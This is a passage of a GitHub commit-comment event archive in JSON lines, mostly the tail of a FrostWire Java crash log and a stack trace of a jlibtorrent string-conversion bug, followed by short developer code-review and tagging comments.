\t/System/Library/Frameworks/Kerberos.framework/Versions/A/Kerberos\r\n0x000000000ecb7000 \t/System/Library/Frameworks/GSS.framework/Versions/A/GSS\r\n0x000000000ecb7000 \t/usr/lib/libresolv.9.dylib\r\n0x000000000ecb7000 \t/usr/lib/libiconv.2.dylib\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/Heimdal.framework/Versions/A/Heimdal\r\n0x000000000ecb7000 \t/usr/lib/libheimdal-asn1.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/OpenDirectory.framework/Versions/A/OpenDirectory\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/CommonAuth.framework/Versions/A/CommonAuth\r\n0x000000000ecb7000 \t/System/Library/Frameworks/OpenDirectory.framework/Versions/A/Frameworks/CFOpenDirectory.framework/Versions/A/CFOpenDirectory\r\n0x000000000ecb7000 \t/System/Library/Frameworks/SecurityFoundation.framework/Versions/A/SecurityFoundation\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/APFS.framework/Versions/A/APFS\r\n0x000000000ecb7000 \t/usr/lib/libutil.dylib\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/AppleSauce.framework/Versions/A/AppleSauce\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/LinguisticData.framework/Versions/A/LinguisticData\r\n0x000000000ecb7000 \t/usr/lib/libmarisa.dylib\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/Lexicon.framework/Versions/A/Lexicon\r\n0x000000000ecb7000 \t/usr/lib/libChineseTokenizer.dylib\r\n0x000000000ecb7000 \t/usr/lib/libcmph.dylib\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/LanguageModeling.framework/Versions/A/LanguageModeling\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/CoreEmoji.framework/Versions/A/CoreEmoji\r\n0x000000000ecb7000 \t/System/Library/Frameworks/ServiceManagement.framework/Versions/A/ServiceManagement\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Versions/A/BackgroundTaskManagement\r\n0x000000000ecb7000 \t/usr/lib/libxslt.1.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/Ink.framework/Versions/A/Ink\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/TextureIO.framework/Versions/A/TextureIO\r\n0x000000000ecb7000 \t/usr/lib/libate.dylib\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/CrashReporterSupport.framework/Versions/A/CrashReporterSupport\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/Sharing.framework/Versions/A/Sharing\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/IconServices.framework/Versions/A/IconServices\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Apple80211\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/CoreUtils.framework/Versions/A/CoreUtils\r\n0x000000000ecb7000 \t/System/Library/Frameworks/CoreWLAN.framework/Versions/A/CoreWLAN\r\n0x000000000ecb7000 \t/System/Library/Frameworks/IOBluetooth.framework/Versions/A/IOBluetooth\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/ProtocolBuffer.framework/Versions/A/ProtocolBuffer\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/CoreWiFi.framework/Versions/A/CoreWiFi\r\n0x000000000ecb7000 \t/System/Library/Frameworks/CoreBluetooth.framework/Versions/A/CoreBluetooth\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/DebugSymbols.framework/Versions/A/DebugSymbols\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/CoreSymbolication.framework/Versions/A/CoreSymbolication\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/Symbolication.framework/Versions/A/Symbolication\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/AppleFSCompression.framework/Versions/A/AppleFSCompression\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/SpeechRecognitionCore.framework/Versions/A/SpeechRecognitionCore\r\n0x0000000108000000 \t/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/server/libjvm.dylib\r\n0x000000000ecb7000 \t/usr/lib/libstdc++.6.0.9.dylib\r\n0x0000000106f5c000 \t/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/libverify.dylib\r\n0x0000000106f6a000 \t/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/libjava.dylib\r\n0x0000000106fa0000 \t/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/libinstrument.dylib\r\n0x0000000108fc9000 \t/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/libzip.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/JavaVM.framework/Versions/A/Frameworks/JavaRuntimeSupport.framework/Versions/A/JavaRuntimeSupport\r\n0x000000000ecb7000 \t/System/Library/Frameworks/JavaVM.framework/Versions/A/Frameworks/JavaNativeFoundation.framework/Versions/A/JavaNativeFoundation\r\n0x000000000ecb7000 \t/System/Library/Frameworks/JavaVM.framework/Versions/A/JavaVM\r\n0x000000000ecb7000 \t/System/Library/Frameworks/Carbon.framework/Versions/A/Carbon\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/JavaLaunching.framework/Versions/A/JavaLaunching\r\n0x000000000ecb7000 \t/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/CommonPanels.framework/Versions/A/CommonPanels\r\n0x000000000ecb7000 \t/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/Help.framework/Versions/A/Help\r\n0x000000000ecb7000 \t/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/ImageCapture.framework/Versions/A/ImageCapture\r\n0x000000000ecb7000 \t/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/OpenScripting.framework/Versions/A/OpenScripting\r\n0x000000000ecb7000 \t/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/Print.framework/Versions/A/Print\r\n0x000000000ecb7000 \t/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/SecurityHI.framework/Versions/A/SecurityHI\r\n0x0000000125c3f000 \t/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/libnet.dylib\r\n0x0000000125c9e000 \t/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/libawt.dylib\r\n0x0000000125d46000 \t/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/./libmlib_image.dylib\r\n0x0000000125e12000 \t/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/libawt_lwawt.dylib\r\n0x0000000125ec7000 \t/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/./libosxapp.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/ExceptionHandling.framework/Versions/A/ExceptionHandling\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/CoreServicesInternal.framework/Versions/A/CoreServicesInternal\r\n0x000000000ecb7000 \t/System/Library/CoreServices/RawCamera.bundle/Contents/MacOS/RawCamera\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/MobileAsset.framework/Versions/A/MobileAsset\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/StreamingZip.framework/Versions/A/StreamingZip\r\n0x000000000ecb7000 \t/System/Library/Frameworks/MediaToolbox.framework/Versions/A/MediaToolbox\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/CoreAVCHD.framework/Versions/A/CoreAVCHD\r\n0x000000000ecb7000 \t/System/Library/Frameworks/MediaAccessibility.framework/Versions/A/MediaAccessibility\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/Mangrove.framework/Versions/A/Mangrove\r\n0x000000000ecb7000 \t/System/Library/Frameworks/CoreMedia.framework/Versions/A/CoreMedia\r\n0x000000000ecb7000 \t/System/Library/Frameworks/VideoToolbox.framework/Versions/A/VideoToolbox\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/CoreAUC.framework/Versions/A/CoreAUC\r\n0x000000000ecb7000 \t/usr/lib/libspindump.dylib\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/AppleVA.framework/Versions/A/AppleVA\r\n0x000000000ecb7000 \t/System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vImage.framework/Versions/A/Libraries/libCGInterfaces.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/Resources/libTrueTypeScaler.dylib\r\n0x000000000ecb7000 \t/System/Library/Extensions/AppleIntelHD5000GraphicsMTLDriver.bundle/Contents/MacOS/AppleIntelHD5000GraphicsMTLDriver\r\n0x000000000ecb7000 \t/System/Library/Extensions/GeForceMTLDriver.bundle/Contents/MacOS/GeForceMTLDriver\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/GPUCompiler.framework/Versions/3802/Libraries/libmetal_timestamp.dylib\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/FamilyControls.framework/Versions/A/FamilyControls\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/CommerceKit.framework/Versions/A/Frameworks/CommerceCore.framework/Versions/A/CommerceCore\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/SystemAdministration.framework/Versions/A/SystemAdministration\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/AppContainer.framework/Versions/A/AppContainer\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/SecCodeWrapper.framework/Versions/A/SecCodeWrapper\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/DiskManagement.framework/Versions/A/DiskManagement\r\n0x000000000ecb7000 \t/System/Library/Frameworks/DirectoryService.framework/Versions/A/DirectoryService\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/DiskImages.framework/Versions/A/DiskImages\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/LoginUIKit.framework/Versions/A/Frameworks/LoginUICore.framework/Versions/A/LoginUICore\r\n0x000000000ecb7000 \t/usr/lib/libCoreStorage.dylib\r\n0x000000000ecb7000 \t/usr/lib/libcsfde.dylib\r\n0x000000000ecb7000 \t/usr/lib/libodfde.dylib\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/MediaKit.framework/Versions/A/MediaKit\r\n0x000000000ecb7000 \t/System/Library/Frameworks/DiscRecording.framework/Versions/A/DiscRecording\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/EFILogin.framework/Versions/A/EFILogin\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/ProtectedCloudStorage.framework/Versions/A/ProtectedCloudStorage\r\n0x000000000ecb7000 \t/usr/lib/libcurl.4.dylib\r\n0x000000000ecb7000 \t/usr/lib/libcrypto.35.dylib\r\n0x000000000ecb7000 \t/usr/lib/libssl.35.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/LDAP.framework/Versions/A/LDAP\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/TrustEvaluationAgent.framework/Versions/A/TrustEvaluationAgent\r\n0x000000000ecb7000 \t/usr/lib/libsasl2.2.dylib\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/CoreDaemon.framework/Versions/B/CoreDaemon\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/AppleSRP.framework/Versions/A/AppleSRP\r\n0x00000001284e5000 \t/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/libfontmanager.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/OpenGL.framework/Versions/A/Resources/GLEngine.bundle/GLEngine\r\n0x000000000ecb7000 \t/System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGLProgrammability.dylib\r\n0x000000012883d000 \t/System/Library/Extensions/AppleIntelHD5000GraphicsGLDriver.bundle/Contents/MacOS/AppleIntelHD5000GraphicsGLDriver\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/GPUSupport.framework/Versions/A/Libraries/libGPUSupportMercury.dylib\r\n0x000000000ecb7000 \t/System/Library/Extensions/GeForceGLDriver.bundle/Contents/MacOS/GeForceGLDriver\r\n0x000000000ecb7000 \t/System/Library/Extensions/GeForceGLDriver.bundle/Contents/MacOS/libclh.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/OpenGL.framework/Versions/A/Resources/GLRendererFloat.bundle/GLRendererFloat\r\n0x000000000ecb7000 \t/System/Library/Frameworks/OpenCL.framework/Versions/A/Libraries/libcldcpuengine.dylib\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/ViewBridge.framework/Versions/A/ViewBridge\r\n0x000000012a08e000 \t/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/libnio.dylib\r\n0x000000012c4f6000 \t/Users/gubatron/workspace.frostwire/frostwire/desktop/lib/native/libjlibtorrent.dylib\r\n0x0000000127e76000 \t/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/libjpeg.dylib\r\n0x0000000130af0000 \t/Users/gubatron/workspace.frostwire/frostwire/desktop/lib/native/libMacOSXUtilsLeopard.jnilib\r\n0x0000000130cfa000 \t/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/libsunec.dylib\r\n0x0000000131119000 \t/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/libdcpr.dylib\r\n0x0000000127c0a000 \t/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/libmanagement.dylib\r\n0x0000000127c18000 \t/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/libosxui.dylib\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/CloudDocs.framework/Versions/A/CloudDocs\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/FileProvider.framework/Versions/A/FileProvider\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/SpotlightIndex.framework/Versions/A/SpotlightIndex\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/SymptomDiagnosticReporter.framework/Versions/A/SymptomDiagnosticReporter\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/GenerationalStorage.framework/Versions/A/GenerationalStorage\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/ChunkingLibrary.framework/Versions/A/ChunkingLibrary\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/CoreNLP.framework/Versions/A/CoreNLP\r\n0x000000000ecb7000 \t/usr/lib/libmecab.1.0.0.dylib\r\n0x000000000ecb7000 \t/usr/lib/libgermantok.dylib\r\n0x000000000ecb7000 \t/usr/lib/libThaiTokenizer.dylib\r\n0x0000000129548000 \t/Users/gubatron/workspace.frostwire/frostwire/desktop/lib/native/libSystemUtilities.jnilib\r\n0x000000012656c000 \t/Users/gubatron/workspace.frostwire/frostwire/desktop/lib/native/libGURLLeopard.jnilib\r\n\r\nVM Arguments:\r\njvm_args: -Djava.library.path=lib/native -javaagent:/Applications/IntelliJ IDEA 2018.1 CE EAP.app/Contents/lib/idea_rt.jar=60540:/Applications/IntelliJ IDEA 2018.1 CE EAP.app/Contents/bin -Dfile.encoding=UTF-8 \r\njava_command: com.limegroup.gnutella.gui.Main\r\njava_class_path (initial): /Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/lib/ant-javafx.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/lib/dt.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/lib/javafx-mx.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/lib/jconsole.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/lib/packager.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/lib/sa-jdi.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/lib/tools.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/charsets.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/deploy.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/javaws.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/jce.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/jfr.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/jfxswt.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/jsse.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/management-agent.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/plugin.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/resources.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/rt.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/ext/cldrdata.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/ext/dnsns.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/ext/jaccess.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/ext/jfxrt.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/ext/localedata.jar:/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Conten\r\nLauncher Type: SUN_STANDARD\r\n\r\nEnvironment Variables:\r\nJAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home\r\nPATH=/Library/Frameworks/Python.framework/Versions/2.7/bin:/usr/local/sbin:/usr/local/Cellar/openssl/1.0.2e/bin:/usr/local/opt/berkeley-db4/include:/Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/bin:/opt/local/bin:/opt/local/sbin:/Users/gubatron/bin:/usr/local/bin:/usr/local/mysql/bin:/usr/bin:/usr/libexec:/Users/gubatron/workspace/chromium/depot_tools:/Users/gubatron/Library/Android/sdk/tools:/Users/gubatron/Library/Android/sdk/platform-tools:/Users/gubatron/Library/Android/sdk/emulator:/usr/local/Cellar/go/1.8/bin::/usr/local/ActivePerl-5.12/bin:/usr/local/ActivePerl-5.12/site/bin:/Users/gubatron/src/mydroid/external/proguard:/Users/gubatron/src/mydroid/external/proguard/bin:/bin:/Users/gubatron/bin/boto/bin:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/MacGPG2/bin:/opt/X11/bin:/Applications/Wireshark.app/Contents/MacOS:/Users/gubatron/workspace.frostwire/punsr-services/scripts:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/MacGPG2/bin:/opt/X11/bin:/Applications/Wireshark.app/Contents/MacOS:/Users/gubatron/src/apktool-install-macosx:/Users/gubatron/workspace.frostwire/android-missing-strings:/Users/gubatron/src/gradle-2.2.1/bin:/Users/gubatron/Downloads/openbazaar-prototype/node_modules/nodewebkit/bin:/usr/local/Cellar/gettext/0.19.6/bin:/Applications/Xcode.app/Contents/Developer/usr/bin:/Users/gubatron/src/monero.mac.x64.v0-9-0-0:/Users/gubatron/workspace.frostwire/tumblrpost:/Users/gubatron/Library/Android/sdk/ndk-bundle:/Users/gubatron/workspace.frostwire/depot_tools\r\nSHELL=/bin/bash\r\nDISPLAY=/private/tmp/com.apple.launchd.9Cq64diJjx/org.macosforge.xquartz:0\r\n\r\nSignal Handlers:\r\nSIGSEGV: [libjvm.dylib+0x5a6d31], sa_mask[0]=11111111011111110111111111111111, sa_flags=SA_ONSTACK|SA_RESTART|SA_SIGINFO\r\nSIGBUS: [libjvm.dylib+0x5a6d31], sa_mask[0]=11111111011111110111111111111111, sa_flags=SA_RESTART|SA_SIGINFO\r\nSIGFPE: [libjvm.dylib+0x480a4c], sa_mask[0]=11111111011111110111111111111111, sa_flags=SA_RESTART|SA_SIGINFO\r\nSIGPIPE: [libjvm.dylib+0x480a4c], sa_mask[0]=11111111011111110111111111111111, sa_flags=SA_RESTART|SA_SIGINFO\r\nSIGXFSZ: [libjvm.dylib+0x480a4c], sa_mask[0]=11111111011111110111111111111111, sa_flags=SA_RESTART|SA_SIGINFO\r\nSIGILL: [libjvm.dylib+0x480a4c], sa_mask[0]=11111111011111110111111111111111, sa_flags=SA_RESTART|SA_SIGINFO\r\nSIGUSR1: SIG_DFL, sa_mask[0]=00000000000000000000000000000000, sa_flags=none\r\nSIGUSR2: [libjvm.dylib+0x48056a], sa_mask[0]=00100000000000000000000000000000, sa_flags=SA_RESTART|SA_SIGINFO\r\nSIGHUP: [libjvm.dylib+0x47eb41], sa_mask[0]=11111111011111110111111111111111, sa_flags=SA_RESTART|SA_SIGINFO\r\nSIGINT: [libjvm.dylib+0x47eb41], sa_mask[0]=11111111011111110111111111111111, sa_flags=SA_RESTART|SA_SIGINFO\r\nSIGTERM: [libjvm.dylib+0x47eb41], sa_mask[0]=11111111011111110111111111111111, sa_flags=SA_RESTART|SA_SIGINFO\r\nSIGQUIT: [libjvm.dylib+0x47eb41], sa_mask[0]=11111111011111110111111111111111, sa_flags=SA_RESTART|SA_SIGINFO\r\n\r\n\r\n---------------  S Y S T E M  ---------------\r\n\r\nOS:Bsduname:Darwin 17.5.0 Darwin Kernel Version 17.5.0: Fri Apr 13 19:32:32 PDT 2018; root:xnu-4570.51.2~1/RELEASE_X86_64 x86_64\r\nrlimit: STACK 8192k, CORE 0k, NPROC 1418, NOFILE 10240, AS infinity\r\nload average:2.92 2.51 2.21\r\n\r\nCPU:total 8 (4 cores per cpu, 2 threads per core) family 6 model 70 stepping 1, cmov, cx8, fxsr, mmx, sse, sse2, sse3, ssse3, sse4.1, sse4.2, popcnt, avx, avx2, aes, clmul, erms, lzcnt, ht, tsc, tscinvbit, bmi1, bmi2\r\n\r\nMemory: 4k page, physical 16777216k(4096444k free)\r\n\r\n/proc/meminfo:\r\n\r\n\r\nvm_info: Java HotSpot(TM) 64-Bit Server VM (25.60-b23) for bsd-amd64 JRE (1.8.0_60-b27), built on Aug  4 2015 10:47:24 by \"java_re\" with gcc 4.2.1 (Based on Apple Inc. build 5658) (LLVM build 2336.11.00)\r\n\r\ntime: Sun Jul  1 07:29:01 2018\r\nelapsed time: 21 seconds (0d 0h 0m 21s)\r\n\r\n```"}},"created_at":"2018-07-01T13:30:10Z"}
{"id":"7903039089","type":"CommitCommentEvent","actor":{"login":"mattatobin"},"repo":{"name":"MoonchildProductions/UXP"},"payload":{"comment":{"id":29558002,"position":null,"line":null,"path":null,"commit_id":"b70d884598e1e14b99190e1e5c349553ff59849b","created_at":"2018-07-01T13:30:40Z","updated_at":"2018-07-01T13:30:40Z","author_association":"MEMBER","body":"Tag #361"}},"created_at":"2018-07-01T13:30:40Z"}
{"id":"7903039332","type":"CommitCommentEvent","actor":{"login":"mattatobin"},"repo":{"name":"MoonchildProductions/UXP"},"payload":{"comment":{"id":29558003,"position":null,"line":null,"path":null,"commit_id":"9ef464a5ac0a17135a0f7b4fef070bb4f7fbe44c","created_at":"2018-07-01T13:30:52Z","updated_at":"2018-07-01T13:30:52Z","author_association":"MEMBER","body":"Tag #361"}},"created_at":"2018-07-01T13:30:52Z"}
{"id":"7903039681","type":"CommitCommentEvent","actor":{"login":"mattatobin"},"repo":{"name":"MoonchildProductions/UXP"},"payload":{"comment":{"id":29558004,"position":null,"line":null,"path":null,"commit_id":"984dad43ae49ba1cfa236af5567bf4c934e59263","created_at":"2018-07-01T13:31:04Z","updated_at":"2018-07-01T13:31:04Z","author_association":"MEMBER","body":"Tag #361"}},"created_at":"2018-07-01T13:31:04Z"}
{"id":"7903040071","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"votaguz/frostwire"},"payload":{"comment":{"id":29558006,"position":null,"line":null,"path":null,"commit_id":"db4e9536668a083b47a4812ab28d4a3a623c76c8","created_at":"2018-07-01T13:31:19Z","updated_at":"2018-07-01T13:31:19Z","author_association":"COLLABORATOR","body":"Crash is here:\r\n```\r\nStack: [0x000070000764a000,0x000070000774a000],  sp=0x0000700007746f80,  free space=1011k\r\nNative frames: (J=compiled Java code, j=interpreted, Vv=VM code, C=native code)\r\nV  [libjvm.dylib+0x57a050]  UTF8::unicode_length(char const*)+0x4\r\nV  [libjvm.dylib+0x2f21fb]  java_lang_String::create_from_str(char const*, Thread*)+0x2d\r\nV  [libjvm.dylib+0x2f2262]  java_lang_String::create_oop_from_str(char const*, Thread*)+0x14\r\nV  [libjvm.dylib+0x31be57]  jni_NewStringUTF+0x66\r\nj  com.frostwire.jlibtorrent.swig.libtorrent_jni.announce_entry_url_get(JLcom/frostwire/jlibtorrent/swig/announce_entry;)Ljava/lang/String;+0\r\nj  com.frostwire.jlibtorrent.swig.announce_entry.getUrl()Ljava/lang/String;+5\r\nj  com.frostwire.jlibtorrent.AnnounceEntry.url()Ljava/lang/String;+4\r\nj  com.frostwire.gui.components.transfers.TransferDetailTrackersDataLine.getValueAt(I)Ljava/lang/Object;+57\r\n```"}},"created_at":"2018-07-01T13:31:19Z"}
{"id":"7903049117","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"votaguz/frostwire"},"payload":{"comment":{"id":29558013,"position":null,"line":null,"path":null,"commit_id":"db4e9536668a083b47a4812ab28d4a3a623c76c8","created_at":"2018-07-01T13:37:48Z","updated_at":"2018-07-01T13:37:48Z","author_association":"COLLABORATOR","body":"CC: @aldenml\r\nprobably a similar bug converting strings from C++ land to Java land. Couldn't really do the Vector2Bytes as the inner code of the function has a swigPtr I can't get to from outside."}},"created_at":"2018-07-01T13:37:48Z"}
{"id":"7903049295","type":"CommitCommentEvent","actor":{"login":"sandy240"},"repo":{"name":"carufus/bbq-samiksha-app"},"payload":{"comment":{"id":29558014,"position":110,"line":518,"path":"app/src/main/java/com/app/bbq/samiksha/QuestionnaireActivity.java","commit_id":"251e5c8bcfaac9dba171b45d98b21f70c457f631","created_at":"2018-07-01T13:37:56Z","updated_at":"2018-07-01T13:37:56Z","author_association":"CONTRIBUTOR","body":"Usage final for variables should be restricted to use as constant. have never seen final keyword for method parameters. Whats was the purpose of using final here?"}},"created_at":"2018-07-01T13:37:56Z"}
{"id":"7903049308","type":"CommitCommentEvent","actor":{"login":"okuguchihonoka"},"repo":{"name":"okuguchihonoka/AtCoder"},"payload":{"comment":{"id":29558015,"position":null,"line":null,"path":null,"commit_id":"b1ec97d60b0316e9b416d7473df66054248cdb77","created_at":"2018-07-01T13:37:56Z","updated_at":"2018-07-01T13:37:56Z","author_association":"OWNER","body":"配列の長さ　動的配列…？"}},"created_at":"2018-07-01T13:37:56Z"}
{"id":"7903050502","type":"CommitCommentEvent","actor":{"login":"tyetech"},"repo":{"name":"tyetech/scoop"},"payload":{"comment":{"id":29558016,"position":null,"line":null,"path":null,"commit_id":"34cc5d62275b430f4eb75d7b9d515a80920e3285","created_at":"2018-07-01T13:38:49Z","updated_at":"2018-07-01T13:38:49Z","author_association":"OWNER","body":"\t+compile 'com.lyft:scoop:0.4.0'"}},"created_at":"2018-07-01T13:38:49Z"}
{"id":"7903051251","type":"CommitCommentEvent","actor":{"login":"cristinacke28"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29558017,"position":null,"line":null,"path":null,"commit_id":"ec67aeec3970024805a06e07c2b24e92121332b5","created_at":"2018-07-01T13:39:20Z","updated_at":"2018-07-01T13:39:20Z","author_association":"NONE","body":"@tibik creating a script sounds easier than updating multiple folders"}},"created_at":"2018-07-01T13:39:20Z"}
{"id":"7903051655","type":"CommitCommentEvent","actor":{"login":"spinute"},"repo":{"name":"spinute/ods"},"payload":{"comment":{"id":29558018,"position":null,"line":null,"path":null,"commit_id":"ddf475f6e99fe15d3506e3fc5a69dd4bfec4030c","created_at":"2018-07-01T13:39:39Z","updated_at":"2018-07-01T13:39:39Z","author_association":"OWNER","body":"あとは「$log(log n)$ 時間の #SSet#」という表現（「f(n) 時間の\"データ構造\"」という表現）には、飛躍がある気もする（？）\r\n\r\nXFastTrie を「検索を $O(log(log n))$ で実行できる #SSet#」、YFastTrie を「いずれの操作も $log(log n)$ で実行できる #SSet#」とするのはどうですかね？（ちょっと長すぎかも）"}},"created_at":"2018-07-01T13:39:39Z"}
{"id":"7903054838","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"IlyaDvortsevoy/NET.S.2018.Dvortsevoy.03"},"payload":{"comment":{"id":29558022,"position":19,"line":19,"path":"Algorithm/RootAlgorithm.cs","commit_id":"f9f2d744a98dedcfde0d7a2554fedcb023202ce5","created_at":"2018-07-01T13:41:53Z","updated_at":"2018-07-01T13:41:53Z","author_association":"NONE","body":"- При реализации не соблюдены все требования, описанные в тесткейсах\r\n- переменная fractionalPart - не нужна, как, собственно, и округление, возвращается next"}},"created_at":"2018-07-01T13:41:53Z"}
